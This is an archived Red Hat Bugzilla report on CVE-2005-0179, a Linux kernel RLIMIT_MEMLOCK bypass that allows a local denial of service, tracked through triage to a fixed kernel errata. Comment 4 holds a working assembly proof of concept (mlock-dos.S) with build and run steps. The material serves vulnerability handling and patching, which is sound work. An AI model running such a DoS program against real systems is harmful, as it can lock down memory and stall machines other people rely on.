Bug 144524

Summary: CVE-2005-0179 RLIMIT_MEMLOCK bypass and (2.6) unprivileged user DoS
Product: Red Hat Enterprise Linux 3 Reporter: Josh Bressers <bressers>
Component: kernelAssignee: Jason Baron <jbaron>
Status: CLOSED ERRATA QA Contact: Brian Brock <bbrock>
Severity: medium Docs Contact:
Priority: medium    
Version: 3.0CC: anderson, jbaron, jparadis, knoel, peterm, petrides, riel, sct
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard: public=20060107,impact=moderate
Fixed In Version: RHSA-2005-663 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2005-09-28 14:41:03 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 156320    
Attachments:
Description Flags
Proposed fix for this issue none

Description Josh Bressers 2005-01-07 22:08:48 UTC
This was reported by grsecurity to full-disclosure
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html

the 'culprit' patch is how the default RLIM_MEMLOCK and the privilege
to call mlockall have changed in 2.6.9. namely, the former has been
reduced to 32 pages while the latter has been relaxed to allow it for
otherwise unprivileged users if their RLIM_MEMLOCK is bigger than the
currently allocated vm. which is normally good enough, except as you
now know there's a path that can increase the allocated vm without
checking for RLIM_MEMLOCK.

Comment 1 Josh Bressers 2005-01-07 22:08:48 UTC
Created attachment 109501 [details]
Proposed fix for this issue

Comment 3 Dave Anderson 2005-03-30 21:36:55 UTC
Can we get a reproducer?  If we mlock a stack page, and then
increase the stack size, separate vma's get created, with the
previously locked stack page getting its own vma.  So we don't
know how expand_stack() is being called such that you can 
exploit it?

The link in comment #1 does not respond.


Comment 4 Dave Anderson 2005-03-30 22:52:09 UTC
Jason Baron forwarded this as the reproducer:

> 6) 2.4/2.6 RLIMIT_MEMLOCK bypass and (2.6) unprivileged user DoS
>
> Taken from the mail from the PaX team to Linus and Andrew Morton:
>
> the 'culprit' patch is how the default RLIM_MEMLOCK and the privilege
> to call mlockall have changed in 2.6.9. namely, the former has been
> reduced to 32 pages while the latter has been relaxed to allow it for
> otherwise unprivileged users if their RLIM_MEMLOCK is bigger than the
> currently allocated vm. which is normally good enough, except as you
> now know there's a path that can increase the allocated vm without
> checking for RLIM_MEMLOCK.
>
> i'm attaching a small i386-specific demonstration, use the makefile to
> create the small self-contained executable, e.g., 'make alloc=0x100000'
> to have it allocate 1MB of stack and lock all of it. for demonstrating
> the full effect of locking down arbitrary amounts of memory, you'll have
> to set your stack rlimit to infinity (ulimit -s unlimited) and allocate
> as much memory as your memory overcommit policy allows (this may mean
> that you'll have to run multiple instances, if you have lots of memory).
>
> surprisingly, in my tests the kernel survived pretty well, it just crawled
> to a snail's speed as every mapped page access required disk i/o ;-). i
> didn't play with overcommit policies nor any special workloads, so there
> may very well be worse effects with that much locked memory. in any case,
> this may warrant 2.6.10.1 because as soon as the fix goes into -bk, anyone
> reading the logs can easily figure it out and reproduce the 'exploit'.
>
> the attached patch is the excerpt from PaX that survives the exploit, so
> i think it's good to go.

Here's the little mlock-dos.S assembly program:

;nasm -f elf mlock-dos.S
;ld -static mlock-dos.o

bits 32

%define MCL_CURRENT     1
%define MCL_FUTURE      2
%define __NR_mlockall   152

section .text
global _start
_start:
        mov     ebx,MCL_CURRENT | MCL_FUTURE
        mov     eax,__NR_mlockall
        int     0x80
        sub     esp,ALLOCATE
        mov     edi,esp
        mov     ecx,ALLOCATE
        cld
        rep     stosb
.x:
        jmp     .x

Following the directions:

$ ulimit -s unlimited
$ make alloc=0x100000
nasm -f elf -DALLOCATE=0x100000 mlock-dos.S
ld -static mlock-dos.o
$ a.out

Then looking at the a.out VM from crash:

crash> vm 11106
PID: 11106  TASK: cbda4000  CPU: 1   COMMAND: "a.out"
   MM       PGD      RSS    TOTAL_VM
d5c00500  dff59600  1036k    1040k
  VMA       START      END    FLAGS  FILE
d22eaf9c   8048000   8049000   1875  /tmp/a.out
cd7f38b4  bfefd000  c0000000 100177
crash>

You can see that the mlockall attempt failed, because the stack's
VMA has flags of 100177, i.e., not including VM_LOCKED (0x2000).
The text section remains unlocked as well (1875).

I'm sure I don't understand why the assembly program's mlockall()
was expected to work.  It certainly fails from a C program.

RHEL3's sys_mlockall() has this:

        lock_limit = current->rlim[RLIMIT_MEMLOCK].rlim_cur;
        lock_limit >>= PAGE_SHIFT;

        ret = -ENOMEM;
        if (current->mm->total_vm > lock_limit && !capable(CAP_IPC_LOCK))
                goto out;

Since our user RLIMIT_MEMLOCK defaults to 4096 bytes, the MCL_CURRENT|MCL_FUTURE
request to mlockall() fails immediately.  Perhaps the upstream RLIMIT_MEMLOCK
is significantly larger?








Comment 5 Dave Anderson 2005-03-30 22:58:49 UTC
It is -- in our rlimits initializer, the RLIMIT_MEMLOCK is PAGE_SIZE: 

#define INIT_RLIMITS                                    \
{                                                       \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {      _STK_LIM, RLIM_INFINITY },               \
        {             0, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {             0,             0 },               \
        {      INR_OPEN,     INR_OPEN  },               \
        {     PAGE_SIZE,     PAGE_SIZE },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
}

Upstream, it's RLIM_INFINITY:

#define INIT_RLIMITS                                    \
{                                                       \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {      _STK_LIM, RLIM_INFINITY },               \
        {             0, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        {             0,             0 },               \
        {      INR_OPEN,     INR_OPEN  },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
        { RLIM_INFINITY, RLIM_INFINITY },               \
}

That being the case, I believe this is NOTABUG.



Comment 6 Ernie Petrides 2005-03-31 03:50:14 UTC
Closing per last comment.

Comment 7 Ernie Petrides 2005-03-31 21:24:02 UTC
Reopening due to further discussion with Jason ... seems that RHEL3 kernels
would still have a problem if the sysadmin were to have raised the default
mlock rlimit (in /etc/security/limits.conf).  But I do agree with Dave in
that default installations are not exploitable.

Comment 11 Ernie Petrides 2005-06-09 03:30:24 UTC
A fix for this problem has just been committed to the RHEL3 U6
patch pool this evening (in kernel version 2.4.21-32.7.EL).


Comment 17 Red Hat Bugzilla 2005-09-28 14:41:04 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2005-663.html